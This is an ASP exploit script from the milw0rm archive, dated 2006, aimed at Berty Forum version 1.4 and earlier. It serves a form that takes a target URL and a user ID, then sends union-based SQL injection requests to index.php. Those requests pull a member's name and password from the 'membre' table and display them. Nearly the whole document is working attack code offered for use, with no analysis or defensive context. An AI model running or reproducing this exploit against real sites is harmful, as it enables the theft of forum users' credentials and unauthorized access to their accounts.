Berty Forum v1.4(index.php) Blind SQL Injection Exploit

<% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== '[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit1.asp '[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ## '[Note : exploit file name =>exploit1.asp '[Using : Write Target and ID after Submit Click '=============================================================================================== %> Berty Forum v1.4(index.php) Blind SQL Injection Exploit Berty Forum <=v1.4(index.php) Blind SQL Injection Exploit

TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]

<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If %> <% If islem = "get" Then string1="/index.php?consult=1&indMemo=" string2="-1%20union select%20" string3="mdp%20" string4="from%20" string5="membre%20" string6="where%20" string7="ind like%20" string8=Request.Form("id") string9="/index.php?consult=1&indMemo=" string10="-1%20union select%20" string11="nom%20" string12="from%20" string13="membre%20" string14="where%20" string15="ind like%20" string16=Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit1.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit1.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit1.asp?islem=hata3") Else %> <% target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8 target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) get_password = take(target2) getdata=InStr(get_username,"""720"" valign=""top"">" ) username=Mid(get_username,getdata+19,20) passwd=Mid(get_password,getdata+19,20) %> ajann

User Name:	<%=username%>
User Password:	<%=passwd%>

<% End If End If End If End If Set objtake = Nothing %> # milw0rm.com [2006-10-24]